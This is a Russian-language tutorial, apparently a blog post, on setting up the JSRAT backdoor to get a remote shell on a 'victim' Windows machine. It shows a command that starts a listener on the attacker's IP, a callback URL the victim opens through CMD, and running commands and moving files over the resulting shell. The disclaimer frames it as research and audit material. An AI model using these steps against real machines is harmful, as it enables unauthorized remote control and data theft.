JSRAT – Javascript бэкдор для управления машиной жертвы |

JSRAT – Javascript бэкдор для управления машиной жертвы

Мануал

JSRAT – это скрипт python, который можно использовать для получения удаленного шелла жертвы.

Установка и настройка

Скачайте инструмент JSRAT здесь

Загрузите и дайте соответствующее разрешение для выполнения скрипта. Рисунок показывает полную установку

Запуск веб-сервера

Запустите и выполните команду:

 

 # python JSRAT.py -i <kali Linux или Attacker Ip> -p 8080 

 

JSRAT предоставляет список URLs.
Скопируйте клиентскую команду для http://192.168.172.143:8080/wtf

Машина жертвы

Откройте этот URL-адрес с помощью браузера жертвы.

Чтобы получить удаленный шелл, сгенерированным URL-адресом, следует открыть с помощью CMD.

После выполнения команды будет получена оболочка.

Возвращаемся на машину атакующего

Вот так !!! Мы подключились к машине жертвы

Попробуем выполнить команду windows: Ipconfig

На приведенном выше рисунке показано, что выполнение команды calc открывает калькулятор windows.

JSRat также может предоставлять файлы загрузки, чтения и скачивания.

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий